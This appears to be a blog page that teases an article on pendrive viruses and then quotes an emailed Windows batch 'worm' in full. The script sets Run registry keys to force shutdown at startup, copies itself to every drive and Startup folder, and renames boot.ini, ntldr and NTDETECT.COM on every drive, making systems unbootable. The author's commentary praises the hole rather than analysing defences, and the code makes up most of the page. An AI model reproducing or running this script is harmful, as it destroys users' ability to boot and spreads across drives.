Say Goodbye to PenDrive Viruses : Turn off Autorun and make your PC running smooth again :)


Now-a-days everyone has the necessity for a PenDrive or FlashDrive or lets just say Removable Storage Devices. And most of the Trojans or viruses gets spreaded from this means. You’ll see commecial shops are very much afraid of using pendrives. Most of them deny service if you want to use a pendrive with you.
Now let us learn some VITAL technics to get rid of this messy headache once and for all. This article is collection of boosted tips & tricks altogether from the net and own experiences. We will learn how to fight with the infections from pendrive viruses like : DiskKnight, Kopa, Brontok etc and also kill them. In most cases we even wont need any antiviruses.

Continue reading

Advertisements

Anatomy of an worm written with plain windows batch commands


On 8/26/07, Shezan <shezan2k7[at]gmail.com> wrote:
I created it with Notepad. I actually created a MS-DOS .bat file using notepad and then converted the shezan.bat file to .exe using using a bat2exe software.. Its nothing . kono bhabe jora tali die baniechhi… Check the source code…..
@echo off
date 12-16-2020 | time 16:00:47.47

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V Shezan /D "shutdown.exe -f" /f

SET KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG ADD %KEY% /V ShezanStart /D "shezan.exe" /f

copy shezan.exe c:
copy shezan.exe d:
copy shezan.exe e:
copy shezan.exe f:
copy shezan.exe g:
copy shezan.exe i:
copy shezan.exe j:
copy shezan.exe k:
copy shezan.exe l:
copy shezan.exe m:
copy shezan.exe n:
copy shezan.exe o:
copy shezan.exe p:
copy shezan.exe q:
copy shezan.exe r:
copy shezan.exe s:
copy shezan.exe t:
copy shezan.exe u:
copy shezan.exe v:
copy shezan.exe w:
copy shezan.exe x:
copy shezan.exe y:
copy shezan.exe z:

copy shezan.exe %windir%
copy shezan.exe "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "D:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "E:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "F:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "G:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "H:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "I:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "J:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "K:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "L:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "M:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "N:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "O:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "P:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Q:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "R:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "S:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "T:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "U:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "V:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "W:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "X:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Y:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy shezan.exe "Z:\Documents and Settings\All Users\Start Menu\Programs\Startup"

Attrib -h -s c:\boot.ini
ren c:\boot.ini shezan.ini

Attrib -h -s d:\boot.ini
ren D:\boot.ini shezan.ini

Attrib -h -s e:\boot.ini
ren E:\boot.ini shezan.ini

Attrib -h -s f:\boot.ini
ren F:\boot.ini shezan.ini

Attrib -h -s g:\boot.ini
ren G:\boot.ini shezan.ini

Attrib -h -s h:\boot.ini
ren H:\boot.ini shezan.ini

Attrib -h -s i:\boot.ini
ren I:\boot.ini shezan.ini

Attrib -h -s j:\boot.ini
ren J:\boot.ini shezan.ini

Attrib -h -s k:\boot.ini
ren K:\boot.ini shezan.ini

Attrib -h -s l:\boot.ini
ren L:\boot.ini shezan.ini

Attrib -h -s m:\boot.ini
ren M:\boot.ini shezan.ini

Attrib -h -s n:\boot.ini
ren N:\boot.ini shezan.ini

Attrib -h -s O:\boot.ini
ren O:\boot.ini shezan.ini

Attrib -h -s p:\boot.ini
ren P:\boot.ini shezan.ini

Attrib -h -s q:\boot.ini
ren Q:\boot.ini shezan.ini

Attrib -h -s r:\boot.ini
ren r:\boot.ini shezan.ini

Attrib -h -s s:\boot.ini
ren S:\boot.ini shezan.ini

Attrib -h -s t:\boot.ini
ren T:\boot.ini shezan.ini

Attrib -h -s u:\boot.ini
ren u:\boot.ini shezan.ini

Attrib -h -s v:\boot.ini
ren v:\boot.ini shezan.ini

Attrib -h -s w:\boot.ini
ren w:\boot.ini shezan.ini

Attrib -h -s x:\boot.ini
ren X:\boot.ini shezan.ini

Attrib -h -s y:\boot.ini
ren Y:\boot.ini shezan.ini

Attrib -h -s z:\boot.ini
ren Z:\boot.ini shezan.ini

Attrib -h -s c:\ntldr
ren c:\ntldr shezanldr

Attrib -h -s d:\ntldr
ren D:\ntldr shezanldr

Attrib -h -s e:\ntldr
ren E:\ntldr shezanldr

Attrib -h -s f:\ntldr
ren F:\ntldr shezanldr

Attrib -h -s g:\ntldr
ren G:\ntldr shezanldr

Attrib -h -s h:\ntldr
ren H:\ntldr shezanldr

Attrib -h -s i:\ntldr
ren I:\ntldr shezanldr

Attrib -h -s j:\ntldr
ren J:\ntldr shezanldr

Attrib -h -s k:\ntldr
ren K:\ntldr shezanldr

Attrib -h -s l:\ntldr
ren L:\ntldr shezanldr

Attrib -h -s m:\ntldr
ren M:\ntldr shezanldr

Attrib -h -s n:\ntldr
ren N:\ntldr shezanldr

Attrib -h -s O:\ntldr
ren O:\ntldr shezanldr

Attrib -h -s p:\ntldr
ren P:\ntldr shezanldr

Attrib -h -s q:\ntldr
ren Q:\ntldr shezanldr

Attrib -h -s r:\ntldr
ren r:\ntldr shezanldr

Attrib -h -s s:\ntldr
ren S:\ntldr shezanldr

Attrib -h -s t:\ntldr
ren T:\ntldr shezanldr

Attrib -h -s u:\ntldr
ren u:\ntldr shezanldr

Attrib -h -s v:\ntldr
ren v:\ntldr shezanldr

Attrib -h -s w:\ntldr
ren w:\ntldr shezanldr

Attrib -h -s x:\ntldr
ren X:\ntldr shezanldr

Attrib -h -s y:\ntldr
ren Y:\ntldr shezanldr

Attrib -h -s z:\ntldr
ren Z:\ntldr shezanldr

Attrib -h -s c:\NTDETECT.COM
ren c:\NTDETECT.COM SHEZAN.COM

Attrib -h -s d:\NTDETECT.COM
ren D:\NTDETECT.COM SHEZAN.COM

Attrib -h -s e:\NTDETECT.COM
ren E:\NTDETECT.COM SHEZAN.COM

Attrib -h -s f:\NTDETECT.COM
ren F:\NTDETECT.COM SHEZAN.COM

Attrib -h -s g:\NTDETECT.COM
ren G:\NTDETECT.COM SHEZAN.COM

Attrib -h -s h:\NTDETECT.COM
ren H:\NTDETECT.COM SHEZAN.COM

Attrib -h -s i:\NTDETECT.COM
ren I:\NTDETECT.COM SHEZAN.COM

Attrib -h -s j:\NTDETECT.COM
ren J:\NTDETECT.COM SHEZAN.COM

Attrib -h -s k:\NTDETECT.COM
ren K:\NTDETECT.COM SHEZAN.COM

Attrib -h -s l:\NTDETECT.COM
ren L:\NTDETECT.COM SHEZAN.COM

Attrib -h -s m:\NTDETECT.COM
ren M:\NTDETECT.COM SHEZAN.COM

Attrib -h -s n:\NTDETECT.COM
ren N:\NTDETECT.COM SHEZAN.COM

Attrib -h -s O:\NTDETECT.COM
ren O:\NTDETECT.COM SHEZAN.COM

Attrib -h -s p:\NTDETECT.COM
ren P:\NTDETECT.COM SHEZAN.COM

Attrib -h -s q:\NTDETECT.COM
ren Q:\NTDETECT.COM SHEZAN.COM

Attrib -h -s r:\NTDETECT.COM
ren r:\NTDETECT.COM SHEZAN.COM

Attrib -h -s s:\NTDETECT.COM
ren S:\NTDETECT.COM SHEZAN.COM

Attrib -h -s t:\NTDETECT.COM
ren T:\NTDETECT.COM SHEZAN.COM

Attrib -h -s u:\NTDETECT.COM
ren u:\NTDETECT.COM SHEZAN.COM

Attrib -h -s v:\NTDETECT.COM
ren v:\NTDETECT.COM SHEZAN.COM

Attrib -h -s w:\NTDETECT.COM
ren w:\NTDETECT.COM SHEZAN.COM

Attrib -h -s x:\NTDETECT.COM
ren X:\NTDETECT.COM SHEZAN.COM

Attrib -h -s y:\NTDETECT.COM
ren Y:\NTDETECT.COM SHEZAN.COM

Attrib -h -s z:\NTDETECT.COM
ren Z:\NTDETECT.COM SHEZAN.COM

shezan.exe
c:\shezan.exe
d:\shezan.exe
e:\shezan.exe
f:\shezan.exe
g:\shezan.exe
h:\shezan.exe
i:\shezan.exe
j:\shezan.exe
k:\shezan.exe
l:\shezan.exe
m:\shezan.exe
n:\shezan.exe
o:\shezan.exe
p:\shezan.exe
q:\shezan.exe
r:\shezan.exe
s:\shezan.exe
t:\shezan.exe
w:\shezan.exe
x:\shezan.exe
y:\shezan.exe
z:\shezan.exe
exit

BRAVO!!! that you’ve found a great security hole windows has. Its a security hole because Windows lets the program change certain settings without making precautions. Have you tested the renaming part of this?
Now listen.. its nothing near to virus. Its just a malware. Virus needs lots of capability to be called as a virus. Replication, infection, spreading automatically, infecting new PCs through any executable files and many more. It can though be called as an worm.
Antiviruses detect it as those test in heuristic mode…